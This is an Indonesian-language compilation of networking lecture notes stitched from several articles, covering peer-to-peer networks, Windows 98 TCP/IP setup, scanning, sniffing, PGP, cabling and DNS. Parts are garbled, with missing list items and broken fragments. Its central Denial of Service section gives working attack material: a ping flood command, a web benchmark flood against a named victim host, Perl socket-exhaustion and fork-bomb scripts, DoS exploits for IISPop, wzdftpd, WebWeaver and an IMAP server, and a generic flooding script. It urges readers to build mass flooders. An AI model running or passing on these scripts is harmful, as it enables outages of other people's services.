2. Diperlukan adanya satu komputer khusus yang berkemampuan lebih untuk ditugaskan
sebagai server.
3. Kelangsungan jaringan sangat tergantung pada server. Bila server mengalami gangguan maka
secara keseluruhan jaringan akan terganggu.
Keunggulan
1. Antar komputer dalam jaringan dapat saling berbagi-pakai fasilitas yang dimilikinya seperti:
harddisk, drive, fax/modem, printer.
2. Biaya operasional relatif lebih murah dibandingkan dengan tipe jaringan client-server, salah
satunya karena tidak memerlukan adanya server yang memiliki kemampuan khusus untuk
mengorganisasikan dan menyediakan fasilitas jaringan.
3. Kelangsungan kerja jaringan tidak tergantung pada satu server. Sehingga bila salah satu
komputer/peer mati atau rusak, jaringan secara keseluruhan tidak akan mengalami gangguan.
Kelemahan
1. Troubleshooting jaringan relatif lebih sulit, karena pada jaringan tipe peer to peer setiap
komputer dimungkinkan untuk terlibat dalam komunikasi yang ada. Di jaringan client-server,
komunikasi adalah antara server dengan workstation.
2. Unjuk kerja lebih rendah dibandingkan dengan jaringan client-server, karena setiap
komputer/peer disamping harus mengelola pemakaian fasilitas jaringan juga harus mengelola
pekerjaan atau aplikasi sendiri.
3. Sistem keamanan jaringan ditentukan oleh masing-masing user dengan mengatur keamanan
masing-masing fasilitas yang dimiliki.
4. Karena data jaringan tersebar di masing-masing komputer dalam jaringan, maka backup
harus dilakukan oleh masing-masing komputer tersebut.
Instalasi dan Konfigurasi Komponen Network
pada Windows 98
Untuk menggunakan fasilitas dan komponen jaringan yang ada pada Windows98, harus terlebih
dahulu menginstall dan mengkonfigurasinya. Tulisan ini akan mendiskusikan bagaimana cara untuk
menginstall dan mengkonfigurasi komponen-komponen jaringan.
Proses pertama memberi nama komputer (unik) untuk memastikan bahwa komputer yang dipakai
dapat dikenali oleh pemakai komputer lain yang terhubung di dalam jaringan komputer.
Menginstall hardware, software untuk membuat komputer terhubung ke dalam jaringan, dan
kemudian mengkonfigurasi protokol yang digunakan komputer untuk “berkomunikasi” dengan
komputer lain.
Note:
Your computer name can have up to 15 characters name, and should contain no blank spaces.
Although Windows98 allows you to enter spaces in a computer name, spaces can cause problems
with network connectivity. For example, MS-DOS clients cannot connect to a computer with spaces
in its name. The names are not case sensitive.
Computer Description
Anda bisa saja mengabaikan deskripsi komputer yang dipakai. Deskripsi komputer akan terlihat oleh
orang lain pada saat browsing di jaringan, bila Anda mengisi computer descripton.
Windows 98 mendukung 4 buah kartu jaringan sekaligus di dalam 1 komputer. Setelah memasang
kartu jaringan selanjutnya, memasang driver kartu jaringan. Untuk menginstall dan mengkonfigurasi
kartu jaringan dilakukan dengan cara icon Add New Hardware Wizard atau Network di Control
Panel.
Gambar 2.2. Menginstall kartu jaringan
Windows 98 secara otomatis memberikan interrupt request (IRQ) dan input/output (I/O) address
untuk kartu jaringan. The base I/O port address defines a memory address through which data will
flow to and from the adapter.
5. Mengkonfigurasi TCP/IP
Implementasi TCP/IP pada Windows98 meliputi protokol standar TCP/IP, kompatible dengan
TCP/IP berbasis jaringan. Protokol standar TCP/IP termasuk:
1. Internet Protocol,
2. Transmission Control Protocol (TCP),
3. Internet Control Message Protocol (ICMP),
4. Address Resolusion Protocol (ARP),
5. User Datagram Protocol (UDP).
TCP/IP harus dikonfigurasikan sebelum dahulu agar bisa “berkomunikasi” di dalam jaringan
komputer. Setiap kartu jaringan komputer yang telah diinstall memerlukan IP address dan subnet
mask. IP address harus unik (berbeda dengan komputer lain), subnet mask digunakan untuk
membedakan network ID dari host ID.
Memberikan IP Address
IP address dan subnet mask dapat diberikan secara otomatis menggunakan Dynamic Host
Configuration Protocol (DHCP) atau disi secara manual.
Gambar 2.4. IP address dalam TCP/IP properties
* Specify an IP address
IP address dan subnet mask diisi secara manual.
Important
If you use a static IP address, make sure the address is accurate. If you assign an incorrect number,
your computer may not able to communicate on the network. You should also prevent another user
from being able to use the network.
5. Klik OK.
6. Jika diperlukan masuk kembali ke dalam kotak dialog TCP/IP Properties, klik tab Gateway,
masukkan nomor alamat server.
7. Klik OK.
8. Jika diperlukan untuk mengaktifkan Windows Internet Naming Service (WINS) server, kembali
ke dalam kotak dialog TCP/IP Properties, klik tab WINS Configuration, dan klik Enable
WINS Resolution serta masukan nomor alamat server.
9. Jika diperlukan untuk mengaktifkan domain name system (DNS), kembali ke dalam kotak
dialog TCP/IP Properties, klik tab DNS Configuration, klik Enable DNS, masukkan nomor
alamat server.
10. Klik OK.
Klik kanan pada Local Area Connection, kemudian pilih Properties, kotak dialog Local Area
Connection Properties akan tampil seperti berikut :
Referensi
1. Purbo Onno W., TCP/IP Standar, Desain dan Implementasi, Elek Media Komputindo, Jakarta,
2001.
2. Purbo Onno W., Teknologi Warung Internet, Elek Media Komputindo, Jakarta, 1999.
3. Tutang, Kodarsyah, Belajar Jaringan Sendiri, Medikom, Jakarta, 2001.
4. Suryadi, TCP/IP dan Internet Sebagai Jaringan Komunikasi Global, Elek Media Komputindo,
Jakarta, 1997.
5. Microsoft Corp., Microsoft Windows98 Training Kit, Microsoft Press, 1998.
6. Microsoft Corp., Networking Essentials Plus 3rd Edition, Microsoft Press, 1999.
7. Wang Wei, Wang Wei’s MCSE Tutorial on Networking Essential.
TCP/IP dan Praktek
Sekuriti Jaringan
Pendahuluan
Jaringan komputer LAN pada suatu organisasi yang membentuk intranet, seperti pada
gambar di bawah, memiliki 1 buah atau lebih server.
Server-server saling berkomunikasi menggunakan suatu aturan yang di sebut protokol.
Internet (IP) IP
Analogi komunikasi di atas seperti 2 orang kepala negara yang saling berkomunikasi
dengan surat. Permintaan aplikasi, misalnya http, sebagai kepala negara A, yang di tujukan
ke server aplikasi (web server), sebagai kepala negara B. Surat dari kepalan negara A
(dengan bahasa A) di terjemahkan dulu ke bahasa Inggris oleh seorang penterjemah,
kemudian di ketik dan di edit oleh sekertaris. Lalu dikirim melalui seorang kurir (jalur
transmisi). Di sisi penerima (negara B), surat tadi akan masuk ke sekertaris dan di proses
adminitrasinya, kemudian di terjemahkan ke bahasa B. Kedua kepala negara tidak seolah-
olah saling berkomunikasi (komunikasi peer to peer) dengan bahasanya masing-masing.
Pekerjaan yang di lakukan oleh protokol TCP/IP dapat digambarkan sebagai berikut.
Sebuah web server misalnya http://www.company.com/ menangani permintaan dari sebuah
browser misalnya Internet Explorer. File index.htm, hendak di kirim ke browser. Di TCP,
file index.htm, akan di pecah-pecah menjadi paket yang lebih kecil dan di beri tanda urutan
paketnya, agar penerima dapat menggabungkan paket tersebut kembali. Tanda urutan paket
disimpan dalam header TCP. Kemudian pada layer IP, di buat header lagi yang berisi
alamat IP asal dan port asal, serta alamat IP dan port tujuan. Dari penjelasan ini dapat
diambil kesimpulan bahwa layer transport dan layer internet, hanya mengolah header,
pengolah data atau menjalankan program (data yang dimaksud dapat berupa data teks,
gambar ataupun sebuah script/program) di lakukan di tingkat aplikasi. Dan port menjadi
penting, karena port merupakan jalan masuk ke aplikasi tertentu. Port pada suatu server
dapat di buka atau di tutup seperlunya sesuai dengan aplikasi yang dilayani server tersebut,
atau jenis komunikasi yang diperbolehkan melewati server tersebut.
Memblok IP
Untuk memblok IP pada PC Windows
dapat digunakan ZoneAlarm
(http://www.zonealarm.com) lisensi gratis
untuk pemakaian gratis.
Untuk mengkonfigurasi ZoneAlarm, pertama kali adalah membedakan LAN dan Internet.
Gambar 8 memperlihatkan konfigurasi IP lokal.
Gambar 9 memperlihatkan policy baik terhadap LAN (lokal) maupun Internet. Terdapat 3
macam policy : low, medium dan high.
Pada TCP connect scan client akan mengirim sinyal SYN, kemudian akan di balas oleh
server dengan sinyal SYN/ACK, untuk mengakhiri hubungan client mengirim ACK sebagai
konfirmasi. Cara ini di sebut 3-way handshake dari TCP. Server akan mencatat (terdeteksi
oleh ZoneAlarm), bila ACK dari client diterima oleh server pada hubungan yang penuh.
Sebenarnya saat client mengirim SYN, server akan menjawab dengan 2 kemungkinan
SYN/ACK bila port terbuka dan RST/ACK bila port tertutup. Dengan informasi ini, client
telah dapat menentukan status port, apapun hasilnya bila client mengirim sinyal RST (bukan
ACK), maka aktifitas client tidak akan tercatat (tidak dapat terdeteksi). Cara ini dikenal
dengan hubungan half-open scanning atau mode stealth. Tool yang dapat melakukan
scanning ini adalah nmap yang bekerja pada sistem operasi UNIX (gambar 10).
Tingkah laku respon server sewaktu scanning dari client berbeda untuk setiap sistem operasi.
Tabel 2 memperlihatkan sinyal dan respon server yang membuatnya dapat dikenali jenis
sistem operasinya. Perlu di catat, parameter pada server dengan mudah diubah, sehingga
prediksi jenis sistem operasi dengan cara di atas bisa tidak tepat.
Sniffer
Program Sniffer yang digunakan adalah Network Monitor dari Distinct Corporation
(http://www.distinct .com ). Program ini merupakan versi trial yang berumur 10 hari. Di
dalam komunikasi TCP/IP atau yang menggunakan model komunikasi 7 layer OSI, sebuah
komputer akan mengirim data dengan alamat komputer tujuan. Pada sebuah LAN dengan
topologi bus atau star dengan menggunakan hub yang tidak dapat melakukan switch (hub
tersebut melakukan broadcast), setiap komputer dalam jaringan tersebut menerima data
tersebut. Standarnya hanya komputer dengan alamat yang bersesuaian dengan alamat
tujuanlah yang akan mengambil data tersebut. Tetapi pada saat snif, komputer dengan
alamat bukan alamat tujuan tetap mengambil data tersebut.
Sebelum melakukan sniff, pertama kali adalah membuka adapter (ethernet card), agar
mengambil semua data yang melewatinya, sekalipun bukan sebagai alamat tujuan. (Gambar
2)
Biasanya data yang melewati Adapter akan sangat banyak, untuk mempermudah encarian,
unakan fasilitas filter seperti terlihat pada gambar 3.
Data Bob
Kirim Data Bob Belum
Dekripsi Terenkripsi Enkripsi dienkripsi
(Chipertext) (plain
text)
Data Bob
Program yang akan digunakan pada percobaan ini adalah PGP 6.0.2 versi freeware, buatan
Network Associates, Inc. (http://www.nai.com).
a. Inisialisasi
b. alamat e-mail
c. Panjang Kunci
e. Kunci Privat
f.
Pemilihan
Bilangan
Acak
g. Kunci
Publik
telah
dibuat
Gambar 9. PGPTools
Enkripsi File
Enkripsi dapat dilakukan dengan meng-click kanan file yang akan diacak pada
Windows Explorer (gambar 10).
Dekripsi File
Kebalikan dari enkripsi adalah dekripsi (gambar 12).
Perbandingan file asli dengan file yang telah di dekripsi (gambar 14).
Kata Pengantar
Pada dasarnya saya mencoba memberikan gambaran umum tentang Denial of Service atau yang lebih kita
kenal dengan DoS. Beberapa pertanyaan yang mungkin bisa terjawab diantaranya :
Pada dasarnya Denial of Service merupakan serangan yang sulit diatasi, hal ini disebabkan oleh resiko layanan
publik dimana admin akan berada pada kondisi yang membingungkan antara layanan dan kenyamanan terhadap
keamanan. Seperti yang kita tahu, keyamanan berbanding terbalik dengan keamanan. Maka resiko yang
mungkin timbul selalu mengikuti hukum ini.
1. Status Sub-Kultural.
2. Untuk mendapatkan akses.
3. Balas dendam.
4. Alasan politik.
5. Alasan ekonomi.
6. Tujuan kejahatan/keisengan.
Status subkultural dalam dunia hacker, adalah sebuah unjuk gigi atau lebih tepat kita sebut sebagai pencarian
jati diri. Adalah sebuah aktifitas umum dikalangan hacker-hacker muda untuk menjukkan kemampuannya dan
Denial of Service merupakan aktifitas hacker diawal karirnya.
Alasan politik dan ekonomi untuk saat sekarang juga merupakan alasan yang paling relevan. Kita bisa melihat
dalam 'perang cyber' (cyber war), serangan DoS bahkan dilakukan secara terdistribusi atau lebih dikenal
dengan istilah 'distribute Denial of Service'. Beberapa kasus serangan virus semacam 'code-red' melakukan
serangan DoS bahkan secara otomatis dengan memanfaatkan komputer yang terinfeksi, komputer ini disebut
'zombie' dalam jargon.
Lebih relevan lagi, keisengan merupakan motif yang paling sering dijumpai. Bukanlah hal sulit untuk
mendapatkan program-program DoS, seperti nestea, teardrop, land, boink, jolt dan vadim. Program-program
DoS dapat melakukan serangan Denial of Service dengan sangat tepat, dan yang terpenting sangat mudah untuk
melakukannya. Cracker cukup mengetikkan satu baris perintah pada Linux Shell yang berupa ./nama_program
argv argc ...
A. Swap Space
B. Bandwidth
C. Kernel Tables
D. RAM
E. Disk
F. Caches
G. INETD
A. Swap Space
Hampir semua sistem menggunakan ratusan MBs spasi swap untuk melayani permintaan client. Spasi swap
juga digunakan untuk mem-'forked' child process. Bagaimanapun spasi swap selalu berubah dan digunakan
dengan sangat berat. Beberapa serangan Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.
B. Bandwidth
C. Kernel Tables
Serangan pada kernel tables, bisa berakibat sangat buruk pada sistem. Alokasi memori kepada kernel juga
merupakan target serangan yang sensitif. Kernel memiliki kernelmap limit, jika sistem mencapai posisi ini,
maka sistem tidak bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.
D. RAM
Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak mau harus di re-boot.
E. Disk
F. Caches
G. INETD
Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan bekerja.
SYN-Flooding
SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole'
pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang lebih
baru) telah mempunyai option konfigurasi untuk mencegah Denial of Service
dengan mencegahmenolak cracker untuk mengakses sistem.
Pentium 'FOOF' Bug
Merupakan serangan Denial of Service terhadap prosessor Pentium yang
menyebabkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis
sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor
yang digunakan yaitu pentium.
Ping Flooding
Ping Flooding adalah brute force Denial of Service sederhana. Jika serangan
dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka
mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network).
Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP.
Varian dari serangan ini disebut "smurfing"
(http://www.quadrunner.com/~chuegen/smurf.txt).
Beberapa hal yang harus dipahami sebelum melakukan serangan ini adalah:
A. Serangan membutuhkan Shell Linux (Unix/Comp)
B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan
fungsi search agar lebih mudah)
C. Menggunakan/membutuhkan GCC (Gnu C Compiler)
5. NewTear
Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk (bonk.c)
6. Syndrop
Merupakan 'serangan gabungan' dari TearDrop dan TCP SYN Flooding. Target
serangan adalah Linux dan Windows
7. TearDrop
TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung
ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug yang
terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini adalah Blue
Screen of Death
1. Ping Flood
Membutuhkan akses root untuk melakukan ini pada sistem Linux. Implementasinya
sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran.
bash # ping -fs 65000 [ip_target]
2. Apache Benchmark
Program-program Benchmark WWW, digunakan untuk mengukur kinerja (kekuatan)
suatu web server, namun tidak tertutup kemungkinan untuk melakukan
penyalahgunaan.
bash $ /usr/sbin/ab -n 10000 -c 300 \
http://korban.com/cgi-bin/search.cgi?q=kata+yang+cukup+umum
(diketik dalam 1 baris!)
Akan melakukan 10000 request paralel 300 kepada host korban.com
3. Menggantung Socket
Apache memiliki kapasitas jumlah koneksi yang kecil. Konfigurasi universal oleh Apache
Software Foundation adalah MaxClients 150, yang berarti hanyak koneksi yang
diperbolehkan mengakses Apache dibatasi sebanyak 150 clients. Jumlah ini sedikit banyak
dapat berkurang mengingat browser lebih dari 1 request simultan dengan koneksi terpisah
-pisah.
Penyerang hanya melakukan koneksi lalu diam, pada saat itu apache akan menunggu
selama waktu yang ditetukan direktif TimeOut (default 5 menit). Dengan mengirimkan
request simultan yang cukup banyak penyerang akan memaksa batasan maksimal
MaxClients. Dampak yang terjadi, clien yang mengakses apache akan tertunda dan apa bila
backlog TCP terlampaui maka terjadi penolakan, seolah-olah server korban tewas.
#!/usr/bin/perl
#
# Nama Script : gs.pl
# Tipe : Denial of Service (DoS)
# Auth : MOBY || eCHo --> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[1]) {
print "Gunakan: perl gs.pl [host] [port] \n";
exit;
}
for (1..1300) {
$fh{$_}=new IO::Socket::INET
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto => "tcp"
or die; print "$_\n"
}
# END. 27 Oktober 2003
# Lakukan dari beberapa LoginShell (komputer) !
#!/usr/bin/perl
fork while 1;
2. Habiskan CPU
#!/usr/bin/perl
for (1..100) { fork or last }
1 while ++$i
3. Habiskan Memory
#!/usr/bin/perl
for (1..20) { fork or last }
while(++$i) { fh{$i} = "X" x 0xff; }
IISPop akan crash jika diserang dengan pengiriman paket data sebesar 289999 bytes, versi yang
vunerable dan telah di coba adalah V: 1.161 dan 1.181
Script: iispdos.pl
#!/usr/bin/perl -w
#
# $0_ : iispdos.pl
# Tipe serangan : Denial of service
# Target : IISPop MAIL SERVER V. 1.161 & 1.181
# Auth : MOBY & eCHo -> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[0]) {
print "Gunakan: perl iispdos.pl [host] \n";
exit;
}
# Data 289999 bytes
$buff = "A" x 289999;
2. Membunuh wzdftpd.
Sofie : wzdftpd
Vendor : http://www.wzdftpd.net
Proof of Concept:
% telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
% telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host
#! /usr/bin/env python
## #!/usr/bin/python (Py Shebang, MOBY)
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########
import sys
import httplib
met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status
Remote Buffer Overflow terjadi apa bila user mengirimkan input (arg) kepada command SELECT.
Dampak dari serangan ini adalah berhentiya server dan harus di-restart secara manual.
Contoh eksploitasi:
--------[ transcript ]-------
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
--------[ transcript ]-------
Perhatian !, contoh eksploitasi diatas menggunakan NetCat (nc), anda bisa dapatkan tool ini pada url:
http://packetstormsecurity.nl dengan kata kunci 'nc' atau 'netcat'
Jika kita perhatikan, serangan flooding memiliki kesamaan, yaitu - tentu saja - membanjiri input
dengan data yang besar. Serangan akan lebih efektif jika dilakukan pada komputer esekutor yang
memiliki bandwidth lebar.
Dari step diatas, kita bisa membuat sebuah skrip universal untuk melakukan serangan DoS.
Skrip ini membutuhkan 3 argumen yaitu: target_address (host/ip target), target_port (port koneksi ke
server korban), dan data (jumlah paket data yang akan dikirim).
-- udos.pl --
#!/usr/bin/perl
#
# $0 : udos.pl
# Auth : MOBY & eCHo -> moby@echo.or.id | mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
#
if (!$ARGV[2]) {
print "Gunakan % perl udos.pl [host] [port] [data] \n";
print "Contoh :\n";
print "\t $ perl udos.pl 127.0.0.1 21 50000 \n";
exit;
}
# Siapkan data
$buffer = "A" x $ARGV[2];
# Connect -> Korban
print "Connecting ... -> $ARGV[0] \n";
$con = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto=> "tcp") or die;
print "Error: $_ \n";
# Connect !
print "Connect !! \n";
print $con "$buffer\n";
close $con;
print "Done. \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";
-- udos.pl --
Skrip sederhana diatas hanya melakukan hubungan dengan server korban, lalu mengirimkan
flood dan melakukan post testing. Dengan sedikit pemprograman anda dapat membuat sebuah
'Mass Flooder' atau 'Brute Force Flooder', tergantung pada kreatifitas anda !
Selalu Up 2 Date.
Seperti contoh serangan diatas, SYN Flooding sangat efektif untuk membekukan
Linux kernel 2.0.*. Dalam hal ini Linux kernel 2.0.30 keatas cukup handal untuk
mengatasi serangan tersebut dikarenakan versi 2.0.30 memiliki option untuk
menolak cracker untuk mengakses system.
Pengantar
Jaringan komputer pada dasarnya adalah jaringan kabel, menghubungkan satu sisi dengan sisi yang lain,
namun bukan berarti kurva tertutup, bisa jadi merupakan kurva terbuka (dengan terminator diujungnya).
Seiring dengan perkembangan teknologi, penghubung antar komputer pun mengalami perubahan serupa.
Mulai dari teknologi telegraf yang memanfaatkan gelombang radio hingga teknologi serat optik dan
laser menjadi tumpuan perkembangan jaringan komputer. Hingga sekarang, teknologi jaringan komputer
bisa menggunakan teknologi “kelas” museum (seperti 10BASE2 menggunakan kabel coaxial) hingga
menggunakan teknologi “langit” (seperti laser dan serat optik).
Akan dibahas sedikit tentang bagaimana komputer terhubung satu sama lain, mulai dari teknologi kabel
coaxial hingga teknologi laser. Keterbatasan pengalaman menyebabkan tulisan ini pun terbatas sifatnya.
Ring Topology
Topologi ini memanfaatkan kurva tertutup, artinya informasi dan data serta traffic disalurkan sedemikian
rupa sehingga masing-masing node. Umumnya fasilitas ini memanfaatkan fiber optic sebagai sarananya
(walaupun ada juga yang menggunakan twisted pair).
sumber: http://fcit.coedu.usf.edu/network/chap5/chap5.htm
Topologi linear bus merupakan topologi yang banyak dipergunakan pada masa penggunaan kabel
Coaxial menjamur. Dengan menggunakan T-Connector (dengan terminator 50ohm pada ujung network),
maka komputer atau perangkat jaringan lainnya bisa dengan mudah dihubungkan satu sama lain.
Kesulitan utama dari penggunaan kabel coaxial adalah sulit untuk mengukur apakah kabel coaxial yang
dipergunakan benar-benar matching atau tidak. Karena kalau tidak sungguh-sungguh diukur secara
benar akan merusak NIC (network interface card) yang dipergunakan dan kinerja jaringan menjadi
terhambat, tidak mencapai kemampuan maksimalnya. Topologi ini juga sering digunakan pada jaringan
dengan basis fiber optic (yang kemudian digabungkan dengan topologi star untuk menghubungkan
dengan client atau node).
Star Topology
sumber: http://fcit.coedu.usf.edu/network/chap5/chap5.htm
Topologi jaringan ini banyak digunakan di berbagai tempat, karena kemudahan untuk menambah,
mengurangi atau mendeteksi kerusakan jaringan yang ada. Selain itu, permasalahan panjang kabel yang
harus sesuai (matching) juga tidak menjadi suatu yang penting lagi. Pokoknya asal ada hub (yang masih
beres tentunya) maka bisa terhubunglah beberapa komputer dan sumber daya jaringan secara mudah.
Dengan berbekal crimtool, kabel UTP (biasanya CAT5) dan connector, seseorang dengan mudah
membuat sebuah sistem jaringan. Tentu ada beberapa kerugian karena panjang kabel (loss effect)
maupun karena hukum konduksi, namun hampir bisa dikatakan semua itu bisa diabaikan.
Paparan ketiga topologi di atas hanya sebagai sebuah pengantar. Intinya bahwa sebuah jaringan bisa jadi
merupakan kombinasi dari dua atau tiga topologi di atas. Misalnya saja ada yang menyebut tree topology,
dimana sebenarnya topologi ini merupakan gabungan atau kombinasi dari ketiga topologi yang ada.
Tree Topology
sumber: http://fcit.coedu.usf.edu/network/chap5/chap5.htm
Nampak pada diagram di atas, backbone memanfaatkan linear bus topology, sedangkan untuk
menghubungkan client atau node memanfaatkan star topology. Jadi bukanlah menjadi suatu hal yang
tabu untuk menggabungkan atau mensinergikan sebuah topologi jaringan dengan topologi jaringan yang
lain.
Contoh Beberapa Jaringan Universitas
sumber: http://www.cso.ui.ac.id/
Seperti nampak pada gambar di atas, JUITA (Jaringan Universitas Indonesia TerpAdu) memanfaatkan
beberapa topology. Untuk backbone di kampus UI Depok, JUITA dibangun di atas FDDI Ring 100Mbps.
Untuk menghubungkan ke client, ada mesin ES/1 yang digunakan untuk router. Karena kondisi di
lapangan (disebabkan batasan maksimum panjang kabel), tidak semua mesin ES/1 terhubung langsung
ke FDDI Ring, namun ada yang memanfaatkan mesin ES/1 lainnya untuk terhubung ke backbone. Dari
masing-masing mesin ES/1 ini kemudian dihubungkan menggunakan star topology ke masing-masing
gedung. Namun dari sambungan masing-masing star topology ini, sebenarnya memanfaatkan bus-linear
topology. Dengan memanfaatkan kabel FiberOptic sebagai sarana koneksi, dari mesin ES/1 ditarik
beberapa buah kabel. Dari kabel-kabel tersebut, ada yang berfungsi untuk kabel utama, namun ada juga
yang digunakan untuk kabel cadangan. Kabel-kabel tersebut kemudian dihubungkan ke hub utama
(menggunakan converter FO). Dari hub utama, untuk menghubungkan dengan gedung lain (yang
melewati outdoor space), digunakanlah kabel FO. Jadi hubungan dari mesin ES/1 ke hub ke gedung lain
dilewatkan adapter di main hub. Jika masih ada gedung lain, maka digunakan juga fiberoptic, dengan
sumber koneksi dari gedung terdekat. Dari masing-masing HUB utama ini, kemudian dihubungkan ke
hub lainnya dengan memanfaatkan star topology. Alasan utama pemilihan kabel fiberoptic untuk
outdoor space adalah dalam rangka mengurangi efek dari serangan petir. Sebab wilayah UI Depok
sangat rawan terhadap serangan petir. Sehingga diharapkan, kabel-kabel yang berada di outdoor space
tidak terganggu oleh adanya serangan petir.
sumber: http://www.tamu.edu/
Jenis Jaringan, Jenis kabel dan Jenis Protocol
yang biasanya digunakan
Source: http://fcit.coedu.usf.edu/network/chap5/chap5.htm
Type dan Jenis Kabel
Setiap jenis kabel mempunyai kemampuan dan spesifikasinya yang berbeda, oleh karena itu dibuatlah
pengenalan tipe kabel. Ada dua jenis kabel yang dikenal secara umum, yaitu twisted pair (UTP
unshielded twisted pair dan STP shielded twisted pair) dan coaxial cable.
Kategori untuk twisted pair yaitu (hingga saat ini, Agustus 2003), yaitu:
Pemberian kategori 1/2/3/4/5/6 merupakan kategori spesifikasi untuk masing-masing kabel tembaga dan
juga untuk jack. Masing-masing merupakan seri revisi atas kualitas kabel, kualitas pembungkusan kabel
(isolator) dan juga untuk kualitas “belitan” (twist) masing-masing pasang kabel. Selain itu juga untuk
menentukan besaran frekuensi yang bisa lewat pada sarana kabel tersebut, dan juga kualitas isolator
sehingga bisa mengurangi efek induksi antar kabel (noise bisa ditekan sedemikian rupa).
Perlu diperhatikan juga, spesifikasi antara CAT5 dan CAT5 enchanced mempunyai standar industri yang
sama, namun pada CAT5e sudah dilengkapi dengan insulator untuk mengurangi efek induksi atau
electromagnetic interference. Kabel CAT5e bisa digunakan untuk menghubungkan network hingga
kecepatan 1Gbps.
Sedangkan untuk coaxial cable, dikenal dua jenis, yaitu thick coaxial cable (mempunyai diameter
lumayan besar) dan thin coaxial cable (mempunyai diameter lebih kecil).
White/Blue
Wire pair #1:
Blue
White/Orange
Wire pair #2:
Orange
White/Green
Wire pair #3:
Green
White/Brown
Wire pair #4:
Brown
Connector yang bisa digunakan untuk UTP Cable CAT5 adalah RJ-45.
Untuk penggunaan koneksi komputer, dikenal 2 buah tipe penyambungan kabel UTP ini, yaitu straight
cable dan crossover cable. Fungsi masing-masing jenis koneksi ini berbeda, straight cable digunakan
untuk menghubungkan client ke hub/router, sedangkan crossover cable digunakan untuk
menghubungkan client ke client atau dalam kasus tertentu digunakan untuk menghubungkan hub ke hub.
STRAIGHT CABLE
Menghubungkan ujung satu dengan ujung lain dengan satu warna, dalam artian ujung nomor satu
merupakan ujung nomor dua di ujung lain. Sebenarnya urutan warna dari masing-masing kabel tidak
menjadi masalah, namun ada standard secara internasional yang digunakan untuk straight cable ini,
yaitu :
Pair#1
Pin 4 wire color: blue
Pin 5 wire color: white/blue
Pair#4
Pin 7 wire color: white/brown
Pin 8 wire color: brown
CROSSOVER CABLE
Dasar Koneksi untuk UTP Crossover Cable
Connector 1 Connector 2
Pinout Pinout
1 3
2 6
3 1
4 OPEN
5 OPEN
6 2
7 OPEN
8 OPEN
pin 1 -> pin 3, pin 2 -> pin 6, pin 3 -> pin 1, and pin 6 -> pin 2.
Pin lainnya dibiarkan tidak terhubung
Rangkuman:
Daftar Pustaka
Baron, E Fowler. 1997-99. An Educator’s Guide to School Network. Florida Center for Instructional
Technology, College of Education, University of South Florida
[Online documentation: http://fcit.coedu.usf.edu/network/default.htm]
Kerr, Robert. 1996. Wiring Tutorial for 10BaseT Unshielded Twisted Pair (UTP). NetSpec. Inc.
[Online documentation: http://www.netspec.com/helpdesk/wiredoc.html]
Pengantar DNS (Domain Name
System)
Sebelum dipergunakannya DNS, jaringan komputer menggunakan HOSTS files yang berisi informasi
dari nama komputer dan IP address-nya. Di Internet, file ini dikelola secara terpusat dan di setiap loaksi
harus di copy versi terbaru dari HOSTS files, dari sini bisa dibayangkan betapa repotnya jika ada
penambahan 1 komputer di jaringan, maka kita harus copy versi terbaru file ini ke setiap lokasi. Dengan
makin meluasnya jaringan internet, hal ini makin merepotkan, akhirnya dibuatkan sebuah solusi dimana
DNS di desain menggantikan fungsi HOSTS files, dengan kelebihan unlimited database size, dan
performace yang baik. DNS adalah sebuah aplikasi services di Internet yang menerjemahkan sebuah
domain name ke IP address. Sebagai contoh, www untuk penggunaan di Internet, lalu diketikan nama
domain, misalnya: yahoo.com maka akan di petakan ke sebuah IP mis 202.68.0.134. Jadi DNS dapat di
analogikan pada pemakaian buku telepon, dimana orang yang kita kenal berdasarkan nama untuk
menghubunginya kita harus memutar nomor telepon di pesawat telepon. Sama persis, host komputer
mengirimkan queries berupa nama komputer dan domain name server ke DNS, lalu oleh DNS dipetakan
ke IP address.
